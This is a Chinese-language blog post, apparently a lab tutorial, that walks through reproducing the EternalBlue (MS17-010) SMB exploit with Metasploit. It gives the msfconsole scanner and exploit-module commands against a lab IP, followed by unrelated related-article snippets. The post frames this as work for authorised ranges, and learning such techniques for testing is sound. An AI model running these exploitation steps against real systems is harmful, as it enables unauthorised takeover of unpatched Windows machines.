msf復現永恒之藍

永恒之藍(EternalBlue)是利用 Windows 系統的 SMB 協議漏洞(MS17-010)來獲取系統最高權限的漏洞,利用 Metasploit 框架(MSF)復現該漏洞是一個復雜且具有一定風險的操作,必須在合法合規的環境下進行,如在經過授權的靶場環境,以下是具體復現步驟:

前期準備

  • 攻擊機:安裝有 Metasploit 工具的 Kali Linux 系統,開啟并聯網,確保 Metasploit 能正常使用。
  • 靶機:存在 MS17-010 漏洞的 Windows 系統,如未打補丁的 Windows 7、Windows Server 2008 R2 等,關閉防火墻和殺毒軟件(僅用于測試環境),并記錄其 IP 地址,假設為 192.168.244.139?。
  • 網絡環境:攻擊機和靶機處于同一局域網,或可以相互通信.

?

利用 MSF 復現永恒之藍漏洞

在 Kali Linux 的終端中輸入msfconsole,回車啟動 Metasploit 框架。

搜索相關模塊:輸入search ms17-010,搜索與 MS17-010 漏洞相關的模塊。在搜索結果中,主要關注auxiliary/scanner/smb/smb_ms17_010(掃描模塊)和exploit/windows/smb/ms17_010_eternalblue(攻擊模塊) 。

掃描目標主機是否存在漏洞

使用掃描模塊:輸入use auxiliary/scanner/smb/smb_ms17_010,使用該掃描模塊。

查看缺少的信息:輸入show options查看缺少的信息

設置目標主機:輸入set rhosts 192.168.244.139(將 IP 地址替換為靶機的實際 IP),設置要掃描的目標主機。

運行掃描:輸入run,開始掃描目標主機是否存在 MS17-010 漏洞。如果目標主機存在漏洞,掃描結果會有相應提示。

調用攻擊模塊:輸入use exploit/windows/smb/ms17_010_eternalblue,調用永恒之藍的攻擊模塊。

配置攻擊模塊:輸入show options查看攻擊模塊的配置項,然后輸入set rhosts 192.168.244.139設置目標機的 IP 地址。

執行攻擊:輸入run運行攻擊模塊,若成功,會與 Windows 7 系統目標機建立連接。

?

這樣就入侵成功了,后續需要進行什么操作可自行選擇?

?

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/88701.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/88701.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/88701.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

格密碼--LWE,DLWE和ss-LWE

格密碼–LWE,DLWE和ss-LWE 0.數學符號數學符號含義備注Zq\mathbb{Z}_qZq?模qqq的整數集合,即{0,1,2,...,q?1}\{0,1,2,...,q-1\}{0,1,2,...,q?1}用于定義LWE、DLWE、ss-LWE等問題中矩陣和向量的元素取值范圍,是基礎整數環x∈RSx \in_R Sx∈…

【閉包】前端的“保護神”——閉包詳解+底層原理

目錄 一、閉包是什么?概念 二、閉包為什么存在?作用 1. 創建私有變量 2. 實現數據封裝與信息隱藏 3. 模擬私有方法 4. 保存函數執行時的狀態 5. 回調函數和事件處理 6. 模塊化編程 7. 懶加載與延遲執行 三、閉包怎么用?實踐業務場景 …

算法學習筆記:19.牛頓迭代法——從原理到實戰,涵蓋 LeetCode 與考研 408 例題

牛頓迭代法(Newtons Method)是一種強大的數值計算方法,由英國數學家艾薩克?牛頓提出。它通過不斷迭代逼近方程的根,具有收斂速度快、適用范圍廣的特點,在科學計算、工程模擬、計算機圖形學等領域有著廣泛應用。牛頓迭…

小白學Python,操作文件和文件夾

目錄 前言 一、操作文件路徑 1.獲取當前路徑 2.創建文件夾 (1)mkdir()函數 (2)makedirs() 函數 3.拼接路徑 4.跳轉路徑 5.判斷相對路徑和絕對路徑 6.獲取文件路徑和文件名 二、操作文件和文件夾 1.查詢文件大小 2.刪除…

015_引用功能與信息溯源

引用功能與信息溯源 目錄 引用功能概述支持的模型引用類型API使用方法引用格式應用場景最佳實踐 引用功能概述 什么是引用功能 Claude的引用功能允許在回答基于文檔的問題時提供詳細的信息來源引用,幫助用戶追蹤和驗證信息的準確性。這個功能特別適用于需要高可…

ROS2中的QoS(Quality of Service)詳解

ROS2中的QoS(Quality of Service)詳解1. 主要QoS參數2. 為什么需要設置QoS3. QoS兼容性規則4. 選擇QoS策略的建議5. 調試QoS問題的方法6. 踩坑:訂閱話題沒有輸出可能的原因:調試方法QoS是ROS2中用于控制通信質量和行為的機制。它定…

Cursor三大核心AI功能

一:Tab鍵:智能小助手 1.1 單行/多行代碼補全 在代碼中寫出要實現的功能,第一次按Tab生成代碼,第二次按Tab接受代碼。1.2 智能代碼重寫 對已有代碼重新編寫。 寫個注釋告訴AI重構方法,然后鼠標點到方法內部,…

cesium添加原生MVT矢量瓦片方案

項目中需要基于cesium接入mvt格式的服務并支持屬性拾取查詢,通過一系列預研測試,最后選擇cesium-mvt-imagery-provider開源插件完成,關鍵源碼信息如下: npm i cesium cesium-mvt-imagery-provider //安裝依賴包// 加載圖層import…

AI金融風控:識別欺詐,量化風險的新利器

AI金融風控:識別欺詐,量化風險的新利器深度學習算法穿透海量交易數據,92.5%的不良貸款識別率宣告了金融風險防控新時代的來臨。深圳桑達銀絡科技有限公司在2025年6月申請的“基于人工智能的金融交易反欺詐系統”專利,揭示了金融風…

【unitrix】 5.0 第二套類型級二進制數基本結構體(types2.rs)

一、源碼 這是一個使用 Rust 類型系統實現類型級(type-level)二進制數的設計。 //! 類型級二進制數表示方案(第二套方案) //! //! 使用嵌套泛型結構體表示二進制數,支持整數和小數表示。use crate::sealed::Sealed;/// 類型級二進制數結構體 …

DAY01:【ML 第一彈】機器學習概述

一、三大概念 1.1 人工智能(AI) Artificial Intelligence 人工智能AI is the field that studies the synthesis and analysis of computational agents that act intelligently 1.2 機器學習(ML) Machine Learning 機器學習Fi…

AGX Xavier 搭建360環視教程【一、先確認方案】

設備默認自帶 NVIDIA 硬件編解碼能力(NVDEC/NVENC),但是需要你在 OpenCV 和 FFmpeg 里正確啟用 調通 GStreamer 或 nvmpi,才真正能用起來!這里的硬解碼是核心:Jetson 平臺的硬解碼,要么走 GStr…

服務器怎么跑Python項目?

在服務器上運行 Python 項目通常涉及 環境配置、依賴安裝、項目部署 和 進程管理。以下是詳細步驟:1. 連接服務器確保你能通過 SSH 訪問服務器:ssh usernameyour_server_ip(如果是本地測試,可跳過這一步)2. 安裝 Pytho…

【軟件設計師】

UML 類圖中的關系用例圖中的關系 關系例子類圖用例圖順序圖 概念示例通信圖活動圖泳道圖狀態圖

Java 內部類詳解:從基礎到實戰,掌握嵌套類、匿名類與局部類的使用技巧

作為一名 Java 開發工程師,你一定在實際開發中遇到過這樣的場景:想在一個類內部定義另一個邏輯相關的類;需要為某個接口或抽象類提供一個臨時實現(比如監聽器);想利用面向對象特性來組織代碼結構&#xff0…

Java設計模式之行為型模式(觀察者模式)介紹與說明

一、模式結構 觀察者模式包含以下四個角色: Subject(主題/被觀察者) 維護觀察者列表,提供注冊(registerObserver)、移除(removeObserver)觀察者的方法,并定義通知所有觀察…

實現一個點擊輸入框可以彈出的數字軟鍵盤控件 qt 5.12

我們將創建兩個自定義組件: 1. NumericInputField:一個輸入框,當點擊時彈出數字鍵盤。 2. NumericKeyboard:一個可縮放的數字鍵盤。 設計思路: - NumericInputField 是一個常規的輸入框,但點擊后會彈出 Num…

Java 深入解析:JVM對象創建與內存機制全景圖

第一章:引言 Java 是一種面向對象的編程語言,對象(Object)是其最基本的組成單位。Java 的“一切皆對象”不僅體現在語法層面,更體現在運行時,幾乎所有數據都以對象形式存在于內存中。 然而,很…

Redis 基本操作筆記

1. Redis 簡介 Redis(Remote Dictionary Server)是一個開源的、高性能的鍵值對存儲系統,通常作為數據庫、緩存、消息中間件等使用。它支持多種數據類型,包括字符串、哈希、列表、集合、有序集合等。 Redis 特點: 性能&…

Docker從環境配置到應用上云的極簡路徑

Docker從環境配置到應用上云的極簡路徑主要包括環境配置、應用容器化、選擇云平臺及部署應用等步驟,具體如下: - 配置Docker環境: - 安裝Docker:根據操作系統下載對應版本的Docker安裝包。如在Linux系統中,可使用命令…